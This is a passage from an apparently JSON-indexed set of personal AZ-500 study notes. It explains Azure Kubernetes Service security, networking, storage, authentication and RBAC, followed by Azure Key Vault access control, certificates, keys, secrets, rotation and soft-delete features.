                            Kubernetes environments, in AKS or elsewhere, currently aren't completely safe for hostile multi-tenant usage. Additional security features such as Pod Security Policies or more fine-grained role-based access controls (RBAC) for nodes make exploits more difficult. However, for true security when running hostile multi-tenant workloads, a hypervisor is the only level of security that you should trust. The security domain for Kubernetes becomes the entire cluster, not an individual node. For these types of hostile multi-tenant workloads, you should use physically isolated clusters.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#46-azure-kubernetes-service-networking","title":"4.6. Azure Kubernetes Service networking","text":"

                            To allow access to your applications, or for application components to communicate with each other, Kubernetes provides an abstraction layer to virtual networking. Kubernetes nodes are connected to a virtual network, and can provide inbound and outbound connectivity for pods. The kube-proxy component runs on each node to provide these network features.

                            In Kubernetes, Services logically group pods to allow for direct access via an IP address or DNS name and on a specific port. You can also distribute traffic using a load balancer. More complex routing of application traffic can also be achieved with Ingress Controllers. Security and filtering of the network traffic for pods is possible with Kubernetes network policies.

                            The Azure platform also helps to simplify virtual networking for AKS clusters. When you create a Kubernetes load balancer, the underlying Azure load balancer resource is created and configured. As you open network ports to pods, the corresponding Azure network security group rules are configured. For HTTP application routing, Azure can also configure external DNS as new ingress routes are configured. In sum up:

                            • Cluster IP\u00a0- Creates an internal IP address for use within the AKS cluster. Good for internal-only applications that support other workloads within the cluster.
                            • NodePort\u00a0- Creates a port mapping on the underlying node that allows the application to be accessed directly with the node IP address and port.
                            • LoadBalancer\u00a0- Creates an Azure load balancer resource, configures an external IP address, and connects the requested pods to the load balancer backend pool. To allow customers' traffic to reach the application, load balancing rules are created on the desired ports.
                            • ExternalName\u00a0- Creates a specific DNS entry for easier application access.

                            The\u00a0Network Policy\u00a0feature in Kubernetes lets you define rules for ingress and egress traffic between pods in a cluster.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#47-azure-kubernetes-service-storage","title":"4.7. Azure Kubernetes Service storage","text":"

                            Applications that run in Azure Kubernetes Service (AKS) may need to store and retrieve data.

                            A volume represents a way to store, retrieve, and persist data across pods and through the application lifecycle. Traditional volumes to store and retrieve data are created as Kubernetes resources backed by Azure Storage. You can manually create these data volumes to be assigned to pods directly, or have Kubernetes automatically create them. These data volumes can use Azure Disks or Azure Files:

                            • Azure Disks\u00a0can be used to create a Kubernetes DataDisk resource. Disks can use Azure Premium storage, backed by high-performance SSDs, or Azure Standard storage, backed by regular HDDs. For most production and development workloads, use Premium storage. Azure Disks are mounted as ReadWriteOnce, so are only available to a single pod. For storage volumes that can be accessed by multiple pods simultaneously, use Azure Files.
                            • Azure Files\u00a0can be used to mount an SMB 3.0 share backed by an Azure Storage account to pods. Files let you share data across multiple nodes and pods. Files can use Azure Standard storage backed by regular HDDs, or Azure Premium storage, backed by high-performance SSDs.

                            Volumes that are defined and created as part of the pod lifecycle only exist until the pod is deleted. Pods often expect their storage to remain if a pod is rescheduled on a different host during a maintenance event, especially in StatefulSets. A persistent volume (PV) is a storage resource created and managed by the Kubernetes API that can exist beyond the lifetime of an individual pod.

                            A\u00a0Persistent Volume\u00a0can be\u00a0statically\u00a0created by a cluster administrator, or\u00a0dynamically\u00a0created by the Kubernetes API server. If a pod is scheduled and requests storage that is not currently available, Kubernetes can create the underlying Azure Disk or Files storage and attach it to the pod. Dynamic provisioning uses a\u00a0StorageClass\u00a0to identify what type of Azure storage needs to be created

                            To define different tiers of storage, such as Premium and Standard, you can create a Storage Class. The StorageClass also defines the reclaimPolicy. This reclaimPolicy controls the behavior of the underlying Azure storage resource when the pod is deleted and the persistent volume may no longer be required. The underlying storage resource can be deleted, or retained for use with a future pod. In AKS, two initial StorageClasses are created:

                            • default\u00a0- Uses Azure Standard storage to create a Managed Disk. The reclaim policy indicates that the underlying Azure Disk is deleted when the persistent volume that used it is deleted.
                            • managed-premium\u00a0- Uses Azure Premium storage to create Managed Disk. The reclaim policy again indicates that the underlying Azure Disk is deleted when the persistent volume that used it is deleted.

                            If no StorageClass is specified for a persistent volume, the default StorageClass is used.

                            A PersistentVolumeClaim requests either Disk or File storage of a particular StorageClass, access mode, and size. The Kubernetes API server can dynamically provision the underlying storage resource in Azure if there is no existing resource to fulfill the claim based on the defined StorageClass. The pod definition includes the volume mount once the volume has been connected to the pod. A PersistentVolume is bound to a PersistentVolumeClaim once an available storage resource has been assigned to the pod requesting it. There is a 1:1 mapping of persistent volumes to claims.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#48-secure-authentication-to-azure-kubernetes-service-with-active-directory","title":"4.8. Secure authentication to Azure Kubernetes Service with Active Directory","text":"

                            There are basically two mechanism to secure authentication to Azure Kebernetes Service:

                            • Kubernetes service accounts: One of the primary user types in Kubernetes is a service account. A service account exists and is managed by, the Kubernetes API. The credentials for service accounts are stored as Kubernetes secrets, which allows them to be used by authorized pods to communicate with the API Server. Most API requests provide an authentication token for a service account or a normal user account. Normal user accounts allow more traditional access for human administrators or developers, not just services and processes. Kubernetes itself doesn't provide an identity management solution where regular user accounts and passwords are stored. Instead, external identity solutions can be integrated into Kubernetes. For AKS clusters, this integrated identity solution is Microsoft Entra ID.
                            • Microsoft Entra integration: The security of AKS clusters can be enhanced with the integration of Microsoft Entra ID. With Microsoft Entra ID, you can integrate on-premises identities into AKS clusters to provide a single source for account management and security. With Microsoft Entra integrated AKS clusters, you can grant users or groups access to Kubernetes resources within a namespace or across the cluster. To obtain a Kubectl configuration context, a user can run the az aks get-credentials command. When a user then interacts with the AKS cluster with kubectl, they are prompted to sign in with their Microsoft Entra credentials. This approach provides a single source for user account management and password credentials. The user can only access the resources as defined by the cluster administrator.

                            Microsoft Entra authentication in AKS clusters uses OpenID Connect, an identity layer built on top of the OAuth 2.0 protocol. OAuth 2.0 defines mechanisms to obtain and use access tokens to access protected resources, and OpenID Connect implements authentication as an extension to the OAuth 2.0 authorization process.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#49-access-to-azure-kubernetes-service-using-azure-role-based-access-controls","title":"4.9. Access to Azure Kubernetes Service using Azure role-based access controls","text":"

                            Azure role-based access control (RBAC) is an authorization system built on\u00a0Azure Resource Manager\u00a0that provides fine-grained access management of Azure resources.

                            RBAC system Description Kubernetes RBAC Designed to work on Kubernetes resources within your AKS cluster. Azure RBAC Designed to work on resources within your Azure subscription.

                            There are two levels of access needed to fully operate an AKS cluster:

                            • Access the AKS resource in your Azure subscription.
                              • Control scaling or upgrading your cluster using the AKS APIs.
                              • Pull your\u00a0kubeconfig.
                            • Access to the Kubernetes API. This access is controlled by either:
                              • Kubernetes RBAC\u00a0(traditionally).
                              • Integrating Azure RBAC with AKS for Kubernetes authorization.

                            Before you assign permissions to users with Kubernetes RBAC, you first define those permissions as a Role. Kubernetes roles grant permissions. There is no concept of a deny permission.

                            Roles are used to grant permissions within a namespace. If you need to grant permissions across the entire cluster, or to cluster resources outside a given namespace, you can instead use ClusterRoles.

                            A ClusterRole works in the same way to grant permissions to resources, but can be applied to resources across the entire cluster, not a specific namespace.

                            Once roles are defined to grant permissions to resources, you assign those Kubernetes RBAC permissions with a RoleBinding. If your AKS cluster integrates with Microsoft Entra ID, bindings are how those Microsoft Entra users are granted permissions to perform actions within the cluster.

                            A ClusterRoleBinding works in the same way to bind roles to users, but can be applied to resources across the entire cluster, not a specific namespace. This approach lets you grant administrators or support engineers access to all resources in the AKS cluster.

                            Secrets at Linux: A Kubernetes Secret is used to inject sensitive data into pods, such as access credentials or keys. You first create a Secret using the Kubernetes API. When you define your pod or deployment, a specific Secret can be requested. Secrets are only provided to nodes that have a scheduled pod that requires it, and the Secret is stored in tmpfs, not written to disk. When the last pod on a node that requires a Secret is deleted, the Secret is deleted from the node's tmpfs. Secrets are stored within a given namespace and can only be accessed by pods within the same namespace. The use of Secrets reduces the sensitive information that is defined in the pod or service YAML manifest. Instead, you request the Secret stored in Kubernetes API Server as part of your YAML manifest. This approach only provides the specific pod access to the Secret. Please note: the raw secret manifest files contains the secret data in base64 format. Therefore, this file should be treated as sensitive information, and never committed to source control.

                            Secrets in Windows containers: Secrets are written in clear text on the node\u2019s volume (as compared to tmpfs/in-memory on linux). This means customers have to do two things:

                            • Use file ACLs to secure the secrets file location
                            • Use volume-level encryption using BitLocker
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/","title":"III. Data and applications","text":"Sources of this notes
                            • The Microsoft e-learn platform.
                            • Book: \"Microsoft Certified - MCA Microsoft Certified Associate Azure Security Engineer Study Guide: Exam AZ-500.
                            • Udemy course: AZ-500 Microsoft Azure Security Technologies Exam Prep.
                            • Udemy course: Azure Security: AZ-500 (updated July 2023)
                            Summary: AZ-500 Microsoft Azure Security Engineer Certification
                            • About the certificate
                            • I. Manage Identity and Access
                            • II. Platform protection
                            • III. Data and applications
                            • IV. Security operations
                            • AZ-500 and more: keep learning

                            Cheatsheets: Azure-CLI | Azure PowerShell

                            100 questions you should pass for the AZ-500 certificate

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#1-azure-key-vault","title":"1. Azure Key Vault","text":"

                            Azure Key Vault helps safeguard cryptographic keys and secrets that cloud applications and services use. Key Vault streamlines the key management process and enables you to maintain control of keys that access and encrypt your data. Developers can create keys for development and testing in minutes, and then migrate them to production keys. Security administrators can grant (and revoke) permission to keys, as needed. You can use Key Vault to create multiple secure containers, called vaults. Vaults help reduce the chances of accidental loss of security information by centralizing application secrets storage. Key vaults also control and log the access to anything stored in them.

                            Azure Key Vault helps address the following issues:

                            • Secrets management. You can use Azure Key Vault to securely store and tightly control access to tokens, passwords, certificates, API keys, and other secrets.
                            • Key management. You use Azure Key Vault as a key management solution, making it easier to create and control the encryption keys used to encrypt your data.
                            • Certificate management. Azure Key Vault is also a service that lets you easily provision, manage, and deploy public and private SSL/TLS certificates for use with Azure and your internal connected resources.
                            • Store secrets backed by hardware security modules (HSMs). The secrets and keys can be protected either by software, or FIPS 140-2 Level 2 validates HSMs.

                            Key Vault is not intended as storage for user passwords.

                            Access to a key vault is controlled through two separate interfaces: management plane, and data plane. The management plane and data plane access controls work independently. Use RBAC to control what users have access to. For example, if you want to grant an application access to use keys in a key vault, you only need to grant data plane access permissions by using key vault access policies, and no management plane access is needed for this application. Conversely, if you want a user to be able to read vault properties and tags but not have any access to keys, secrets, or certificates, you can grant this user read access by using RBAC, and no access to the data plane is required.

                            If a user has contributor permissions (RBAC) to a key vault management plane, they can grant themselves access to the data plane by setting a key vault access policy. We recommend that you tightly control who has contributor access to your key vaults, to ensure that only authorized persons can access and manage your key vaults, keys, secrets, and certificates.

                            Azure Resource Manager can securely deploy certificates stored in Azure Key Vault to Azure VMs when the VMs are deployed. By setting appropriate access policies for the key vault, you also control who gets access to your certificate. Another benefit is that you manage all your certificates in one place in Azure Key Vault.

                            Deletion of key vaults or key vault objects can be either inadvertent or malicious. Enable the soft delete and purge protection features of Key Vault, particularly for keys that are used to encrypt data at rest. Deletion of these keys is equivalent to data loss, so you can recover deleted vaults and vault objects if needed. Practice Key Vault recovery operations on a regular basis.

                            Azure Key Vault is offered in two service tiers\u2014standard and premium. The main difference between Standard and Premium is that Premium supports HSM-protected keys.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#11-configure-key-vault-access","title":"1.1. Configure Key Vault access","text":"

                            Access to a key vault is controlled through two interfaces: the management plane, and the data plane. The management plane is where you manage Key Vault itself. Operations in this plane include creating and deleting key vaults, retrieving Key Vault properties, and updating access policies. The data plane is where you work with the data stored in a key vault. You can add, delete, and modify keys, secrets, and certificates from here.

                            To access a key vault in either plane, all callers (users or applications) must have proper authentication and authorization. Authentication establishes the identity of the caller. Authorization determines which operations the caller can execute.

                            Both planes use Microsoft Entra ID for authentication. For authorization, the management plane uses RBAC, and the data plane can use either\u00a0newly added RBAC\u00a0or a Key Vault access policy.

                            When you create a key vault in an Azure subscription, its automatically associated with the Microsoft Entra tenant of the subscription. Applications can access Key Vault in two ways:

                            • User plus application access. The application accesses Key Vault on behalf of a signed-in user. Examples of this type of access include Azure PowerShell and the Azure portal. User access is granted in two ways. They can either access Key Vault from any application, or they must use a specific application (referred to as compound identity).
                            • Application-only access. The application runs as a daemon service or background job. The application identity is granted access to the key vault.

                            For both types of access, the application authenticates with Microsoft Entra ID. The model of a single mechanism for authentication to both planes has several benefits:

                            • Organizations can centrally control access to all key vaults in their organization.
                            • If a user leaves, they instantly lose access to all key vaults in the organization.
                            • Organizations can customize authentication by using the options in Microsoft Entra ID, such as to enable multifactor authentication for added security.
                            Role Management plane permissions Data plane permissions Security team Key Vault Contributor Keys: backup, create, delete, get, import, list, restore. Secrets: all operations Developers and operators Key Vault deploy permission\u00a0Note: This permission allows deployed VMs to fetch secrets from a key vault. None Auditors None Keys: list Secrets: list.\u00a0Note: This permission enables auditors to inspect attributes (tags, activation dates, expiration dates) for keys and secrets not emitted in the logs. Application None Keys: sign Secrets: get

                            The three team roles need access to other resources along with Key Vault permissions. To deploy VMs (or the Web Apps feature of Azure App Service), developers and operators need Contributor access to those resource types. Auditors need read access to the Storage account where the Key Vault logs are stored.

                            Some built-in RBAC in Azure:

                            Built-in role Description ID Key Vault Administrator Perform all data plane operations on a key vault and all objects in it, including certificates, keys, and secrets. Cannot manage key vault resources or manage role assignments. Only works for key vaults that use the 'Azure role-based access control' permission model. 00482a5a-887f-4fb3-b363-3b7fe8e74483 Key Vault Certificates Officer Perform any action on the certificates of a key vault, except manage permissions. Only works for key vaults that use the 'Azure role-based access control' permission model. a4417e6f-fecd-4de8-b567-7b0420556985 Key Vault Crypto Officer Perform any action on the keys of a key vault, except manage permissions. Only works for key vaults that use the 'Azure role-based access control' permission model. 14b46e9e-c2b7-41b4-b07b-48a6ebf60603 Key Vault Crypto Service Encryption User Read metadata of keys and perform wrap/unwrap operations. Only works for key vaults that use the 'Azure role-based access control' permission model. e147488a-f6f5-4113-8e2d-b22465e65bf6 Key Vault Crypto User Perform cryptographic operations using keys. Only works for key vaults that use the 'Azure role-based access control' permission model. 12338af0-0e69-4776-bea7-57ae8d297424 Key Vault Reader Read metadata of key vaults and its certificates, keys, and secrets. Cannot read sensitive values such as secret contents or key material. Only works for key vaults that use the 'Azure role-based access control' permission model. 21090545-7ca7-4776-b22c-e363652d74d2 Key Vault Secrets Officer Perform any action on the secrets of a key vault, except manage permissions. Only works for key vaults that use the 'Azure role-based access control' permission model. b86a8fe4-44ce-4948-aee5-eccb2c155cd7 Key Vault Secrets User Read secret contents including secret portion of a certificate with private key. Only works for key vaults that use the 'Azure role-based access control' permission model. 4633458b-17de-408a-b874-0445c86b69e6","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#12-deploy-and-manage-key-vault-certificates","title":"1.2. Deploy and manage Key Vault certificates","text":"

                            Key Vault certificates support provides for management of your x509 certificates and enables:

                            • A certificate owner to create a certificate through a Key Vault creation process or through the import of an existing certificate. Includes both self-signed and CA-generated certificates.
                            • A Key Vault certificate owner to implement secure storage and management of X509 certificates without interaction with private key material.
                            • A certificate owner to create a policy that directs Key Vault to manage the life-cycle of a certificate.
                            • Certificate owners to provide contact information for notification about lifecycle events of expiration and renewal of certificate.
                            • Automatic renewal with selected issuers - Key Vault partner X509 certificate providers and CAs.

                            When a Key Vault certificate is created, an addressable key and secret are also created with the same name. The Key Vault key allows key operations and the Key Vault secret allows retrieval of the certificate value as a secret. A Key Vault certificate also contains public x509 certificate metadata.

                            When a Key Vault certificate is created, it can be retrieved from the addressable secret with the private key in either PFX or PEM format. However, the policy used to create the certificate must indicate that the key is exportable. If the policy indicates non-exportable, then the private key isn't a part of the value when retrieved as a secret.

                            The addressable key becomes more relevant with non-exportable Key Vault certificates. The addressable Key Vault key\u2019s operations are mapped from the\u00a0keyusage\u00a0field of the Key Vault certificate policy used to create the Key Vault certificate. If a Key Vault certificate expires, it\u2019s addressable key and secret become inoperable.

                            Two types of key are supported \u2013 RSA or RSA HSM with certificates. Exportable is only allowed with RSA, and is not supported by RSA HSM.

                            Certificate policy

                            A certificate policy contains information on how to create and manage the Key Vault certificate lifecycle. When a certificate with private key is imported into the Key Vault, a default policy is created by reading the x509 certificate. When a Key Vault certificate is created from scratch, a policy needs to be supplied. This policy specifies how to create the Key Vault certificate version, or the next Key Vault certificate version. At a high level, a certificate policy contains the following information:

                            • X509 certificate properties. Contains subject name, subject alternate names, and other properties used to create an x509 certificate request.
                            • Key Properties. Contains key type, key length, exportable, and reuse key fields. These fields instruct key vault on how to generate a key.
                            • Secret properties. Contains secret properties such as content type of addressable secret to generate the secret value, for retrieving certificate as a secret.
                            • Lifetime Actions. Contains lifetime actions for the Key Vault certificate. Each lifetime action contains:
                              • Trigger, which specifies via days before expiry or lifetime span percentage.
                              • Action, which specifies the action type: emailContacts, or autoRenew.
                            • Issuer: Contains the parameters about the certificate issuer to use to issue x509 certificates.
                            • Policy attributes: Contains attributes associated with the policy.

                            Certificate Issuer

                            Before you can create a certificate issuer in a Key Vault, the following two prerequisite steps must be completed successfully:

                            1. Onboard to CA providers: An organization administrator must onboard their company with at least one CA provider.
                            2. Admin creates requester credentials for Key Vault to enroll (and renew) SSL certificates: Provides the configuration to be used to create an issuer object of the provider in the key vault.

                            Certificate contacts

                            Certificate contacts contain contact information to send notifications triggered by certificate lifetime events. The contacts information is shared by all the certificates in the key vault. If a certificate's policy is set to auto renewal, then a notification is sent for the following events:

                            • Before certificate renewal
                            • After certificate renewal, and stating if the certificate was successfully renewed, or if there was an error, requiring manual renewal of the certificate
                            • When it\u2019s time to renew a certificate for a certificate policy that is set to manually renew (email only)

                            Certificate access control

                            The Key Vault that contains certificates manages access control for those same certificates. he access control policy for certificates is distinct from the access control policies for keys and secrets in the same Key Vault. Users might create one or more vaults to hold certificates, to maintain scenario appropriate segmentation and management of certificates.

                            • Permissions for certificate management operations:
                              • get: Get the current certificate version, or any version of a certificate.
                              • list: List the current certificates, or versions of a certificate.
                              • update: Update a certificate.
                              • create: Create a Key Vault certificate.
                              • import: Import certificate material into a Key Vault certificate.
                              • delete: Delete a certificate, its policy, and all of its versions.
                              • recover: Recover a deleted certificate.
                              • backup: Back up a certificate in a key vault.
                              • restore: Restore a backed-up certificate to a key vault.
                              • managecontacts: Manage Key Vault certificate contacts.
                              • manageissuers: Manage Key Vault certificate authorities/issuers.
                              • getissuers: Get a certificate's authorities/issuers.
                              • listissuers: List a certificate's authorities/issuers.
                              • setissuers: Create or update a Key Vault certificate's authorities/issuers.
                              • deleteissuers: Delete a Key Vault certificate's authorities/issuers.
                            • Permissions for privileged operations:
                              • purge: Purge (permanently delete) a deleted certificate.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#13-create-key-vault-keys","title":"1.3. Create Key Vault keys","text":"

                            Cryptographic keys in Key Vault are represented as\u00a0JSON Web Key (JWK)\u00a0objects. There are two types of keys, depending on how they were created.

                            • Soft keys: A key processed in software by Key Vault, but is encrypted at rest using a system key that is in a\u00a0Hardware Security Module (HSM). Clients may import an existing RSA or EC (Elliptic Curve) key, or request that Key Vault generates one.
                            • Hard keys: A key processed in an HSM (Hardware Security Module). These keys are protected in one of the Key Vault HSM Security Worlds (there's one Security World per geography to maintain isolation). Clients may import an RSA or EC key, in soft form or by exporting from a compatible HSM device. Clients may also request Key Vault to generate a key.

                            Key operations. - Key Vault supports many operations on key objects. Here are a few:

                            • Create: Allows a client to create a key in Key Vault. The value of the key is generated by Key Vault and stored, and isn't released to the client. Asymmetric keys may be created in Key Vault.
                            • Import: Allows a client to import an existing key to Key Vault. Asymmetric keys may be imported to Key Vault using many different packaging methods within a JWK construct.
                            • Update: Allows a client with sufficient permissions to modify the metadata (key attributes) associated with a key previously stored within Key Vault.
                            • Delete: Allows a client with sufficient permissions to delete a key from Key Vault

                            Cryptographic operations. - Once a key has been created in Key Vault, the following cryptographic operations may be performed using the key. For best application performance, verify that operations are performed locally.

                            • Sign and Verify: Strictly, this operation is \"sign hash\" or \"verify hash\", as Key Vault doesn't support hashing of content as part of signature creation. Applications should hash the data to be signed locally, then request that Key Vault signs the hash. Verification of signed hashes is supported as a convenience operation for applications that may not have access to [public] key material.
                            • Key Encryption / Wrapping: A key stored in Key Vault may be used to protect another key, typically a symmetric\u00a0content encryption key (CEK). When the key in Key Vault is asymmetric, key encryption is used. When the key in Key Vault is symmetric, key wrapping is used.
                            • Encrypt and Decrypt: A key stored in Key Vault may be used to encrypt or decrypt a single block of data. The size of the block is determined using the key type and selected encryption algorithm. The Encrypt operation is provided for convenience, for applications that may not have access to [public] key material.

                            Apps hosted in App Service and Azure Functions can now define a reference to a secret managed in Key Vault as part of their application settings.

                            Configure a hardware security module key-generation solution. -

                            For added assurance, when you use Azure Key Vault, you can import or generate keys in hardware security modules (HSMs) that never leave the HSM boundary. This scenario is often referred to as Bring Your Own Key (BYOK). The HSMs are FIPS 140-2 Level 2 validated. Azure Key Vault uses Thales nShield family of HSMs to protect your keys. (This functionality isn't available for Azure China.) Generating and transferring an HSM-protected key over the Internet:

                            • You generate the key from an offline workstation, which reduces the attack surface.
                            • The key is encrypted with a\u00a0Key Exchange Key (KEK), which stays encrypted until transferred to the Azure Key Vault HSMs. Only the encrypted version of your key leaves the original workstation.
                            • The toolset sets properties on your tenant key that binds your key to the Azure Key Vault security world. After the Azure Key Vault HSMs receive and decrypt your key, only these HSMs can use it. Your key can't be exported. This binding is enforced using the Thales HSMs.
                            • The KEK that encrypts your key is generated inside the Azure Key Vault HSMs, and isn't exportable. The HSMs enforce that there can be no clear version of the KEK outside the HSMs. In addition, the toolset includes attestation from Thales that the KEK isn't exportable and was generated inside a genuine HSM manufactured by Thales.
                            • The toolset includes attestation from Thales that the Azure Key Vault security world was also generated on a genuine HSM manufactured by Thales.
                            • Microsoft uses separate KEKs and separate security worlds in each geographical region. This separation ensures that your key can be used only in data centers in the region in which you encrypted it. For example, a key from a European customer can't be used in data centers in North American or Asia.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#14-manage-customer-managed-keys","title":"1.4. Manage customer managed keys","text":"

                            Once, you have created your Key Vault and have populated it with keys and secrets. The next step is to set up a rotation strategy for the values you store as Key Vault secrets. Secrets can be rotated in several ways:

                            • As part of a manual process
                            • Programmatically by using REST API calls
                            • Through an Azure Automation script

                            Example of storage service encryption with customer-managed Keys. - This service uses Azure Key Vault that provides highly available and scalable secure storage for RSA cryptographic keys backed by FIPS 140-2 Level 2 validated HSMs (Hardware Security Modules). Key Vault streamlines the key management process and enables customers to maintain control of keys that are used to encrypt data, manage, and audit their key usage, in order to protect sensitive data as part of their regulatory or compliance needs, HIPAA and BAA compliant.

                            Customers can generate/import their RSA key to Azure Key Vault and enable Storage Service Encryption. Azure Storage handles the encryption and decryption in a fully transparent fashion using envelope encryption in which data is encrypted using an AES-based key, which in turn is protected using the Customer-Managed Key stored in Azure Key Vault.

                            Customers can rotate their key in Azure Key Vault as per their compliance policies. When they rotate their key, Azure Storage detects the new key version and re-encrypts the Account Encryption Key for that storage account. Key rotation doesn't result in re-encryption of all data and there's no other action required from user.

                            Customers can also revoke access to the storage account by revoking access on their key in Azure Key Vault. There are several ways to revoke access to your keys. Revoking access effectively blocks access to all blobs in the storage account as the Account Encryption Key is inaccessible by Azure Storage.

                            Customers can enable this feature on all available redundancy types of Azure Blob storage including premium storage and can toggle from using Microsoft managed to using customer-managed keys. There's no extra charge for enabling this feature.

                            You can enable this feature on any Azure Resource Manager storage account using the Azure portal, Azure PowerShell, Azure CLI, or the Microsoft Azure Storage Resource Provider API.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#15-key-vault-secrets","title":"1.5. Key vault secrets","text":"

                            Key Vault provides secure storage of secrets, such as passwords and database connection strings. From a developer's perspective, Key Vault APIs accept and return secret values as strings. Internally, Key Vault stores and manages secrets as sequences of octets (8-bit bytes), with a maximum size of 25k bytes each. The Key Vault service doesn't provide semantics for secrets. It merely accepts the data, encrypts it, stores it, and returns a secret identifier (\"ID\"). The identifier can be used to retrieve the secret at a later time.

                            Key Vault also supports a contentType field for secrets. Clients may specify the content type of a secret to assist in interpreting the secret data when it's retrieved. The maximum length of this field is 255 characters. There are no pre-defined values. The suggested usage is as a hint for interpreting the secret data. For instance, an implementation may store both passwords and certificates as secrets, then use this field to differentiate.

                            As shown above, the values for Key Vault Secrets are:

                            • Name-value pair -\u00a0Name must be unique in the Vault
                            • Value can be any\u00a0Unicode Transformation Format (UTF-8)\u00a0string - max of 25 KB in size
                            • Manual or certificate creation
                            • Activation date
                            • Expiration date

                            Encryption. - All secrets in your Key Vault are stored encrypted. Key Vault encrypts secrets at rest with a hierarchy of encryption keys, with all keys in that hierarchy are protected by modules that are Federal Information Processing Standards (FIPS) 140-2 compliant. This encryption is transparent, and requires no action from the user. The Azure Key Vault service encrypts your secrets when you add them, and decrypts them automatically when you read them. The encryption leaf key of the key hierarchy is unique to each key vault. The encryption root key of the key hierarchy is unique to the security world, and its protection level varies between regions:

                            • China: root key is protected by a module that is validated for FIPS 140-2 Level 1.
                            • Other regions: root key is protected by a module that is validated for FIPS 140-2 Level 2 or higher.

                            Secret attributes. - In addition to the secret data, the following attributes may be specified:

                            • exp: IntDate, optional,\u00a0default is forever. The\u00a0exp\u00a0(expiration time)\u00a0attribute identifies the expiration time on or after which the secret data\u00a0SHOULD NOT\u00a0be retrieved, except in particular situations. This field is for informational purposes only as it informs users of key vault service that a particular secret may not be used. Its value MUST be a number containing an IntDate value.
                            • nbf: IntDate, optional,\u00a0default is now. The\u00a0nbf\u00a0(not before)\u00a0attribute identifies the time before which the secret data\u00a0SHOULD NOT\u00a0be retrieved, except in particular situations. This field is for informational purposes only. Its value\u00a0MUST\u00a0be a number containing an IntDate value.
                            • enabled: boolean, optional,\u00a0default is true. This attribute specifies whether the secret data can be retrieved. The enabled attribute is used with\u00a0nbf\u00a0and\u00a0exp\u00a0when an operation occurs between\u00a0nbf\u00a0and\u00a0exp, it will only be permitted if enabled is set to true. Operations outside the\u00a0nbf\u00a0and\u00a0exp\u00a0window are automatically disallowed, except in particular situations.

                            There are more read-only attributes that are included in any response that includes secret attributes:

                            • created: IntDate, optional. The created attribute indicates when this version of the secret was created. This value is null for secrets created prior to the addition of this attribute. Its value must be a number containing an IntDate value.
                            • updated: IntDate, optional. The updated attribute indicates when this version of the secret was updated. This value is null for secrets that were last updated prior to the addition of this attribute. Its value must be a number containing an IntDate value.

                            Secret access control. - Access Control for secrets managed in Key Vault, is provided at the level of the Key Vault that contains those secrets. The following permissions can be used, on a per-principal basis, in the secrets access control entry on a vault, and closely mirror the operations allowed on a secret object:

                            • Permissions for secret management operations

                              • get: Read a secret
                              • list: List the secrets or versions of a secret stored in a Key Vault
                              • set: Create a secret
                              • delete: Delete a secret
                              • recover: Recover a deleted secret
                              • backup: Back up a secret in a key vault
                              • restore: Restore a backed up secret to a key vault
                              • Permissions for privileged operations

                              • purge: Purge (permanently delete) a deleted secret

                            You can specify more application-specific metadata in the form of tags. Key Vault supports up to 15 tags, each of which can have a 256 character name and a 256 character value.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#configure-key-rotation","title":"Configure key rotation","text":"

                            Once you have keys and secrets stored in the key vault it's important to think about a rotation strategy. There are several ways to rotate the values:

                            • As part of a manual process
                            • Programmatically by using API calls
                            • Through an Azure Automation script

                            This diagram shows how Event Grid and Function Apps can be used to automate the process.

                            1. Thirty days before the expiration date of a secret, Key Vault publishes the \"near expiry\" event to Event Grid.
                            2. Event Grid checks the event subscriptions and uses HTTP POST to call the function app endpoint subscribed to the event.
                            3. The function app receives the secret information, generates a new random password, and creates a new version for the secret with the new password in Key Vault.
                            4. The function app updates SQL Server with the new password.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#16-manage-key-vault-safety-and-recovery-features","title":"1.6. Manage Key Vault safety and recovery features","text":"

                            Key Vault's soft-delete feature allows recovery of the deleted vaults and deleted key vault objects (for example, keys, secrets, certificates), known as soft-delete. This safeguard offer the following protections:

                            • Once a secret, key, certificate, or key vault is deleted, it remains recoverable for a configurable period of 7 to 90 calendar days. If no configuration is specified, the default recovery period is set to 90 days. Users are provided with sufficient time to notice an accidental secret deletion and respond.
                            • When creating a new key vault, soft-delete is on by default. Once soft-delete is enabled on a key vault, it can't be disabled. Once set, the retention policy interval can't be changed.
                            • The soft-delete feature is available through the REST API, the Azure CLI, PowerShell, .NET/C# interfaces, and ARM templates.
                            • The purge protection retention policy uses the same interval (7-90 days). Once set, the retention policy interval can't be changed.
                            • You can't reuse the name of a key vault that has been soft-deleted until the retention period has passed.
                            • Permanently deleting, purging, a key vault is possible via a POST operation on the proxy resource and requires special privileges. Generally, only the subscription owner is able to purge a key vault. The POST operation triggers the immediate and irrecoverable deletion of that vault. Exceptions are:

                              • When the Azure subscription has been marked as\u00a0undeletable. In this case, only the service may then perform the actual deletion, and does so as a scheduled process.
                              • When the--enable-purge-protection argument is enabled on the vault itself. In this case, Key Vault waits for 90 days from when the original secret object was marked for deletion to permanently delete the object.
                            • To purge a secret in the soft-deleted state, a service principal must be granted another \"purge\" access policy permission. The purge access policy permission isn't granted by default to any service principal including key vault and subscription owners and must be deliberately set. By requiring an elevated access policy permission to purge a soft-deleted secret, it reduces the probability of accidentally deleting a secret.

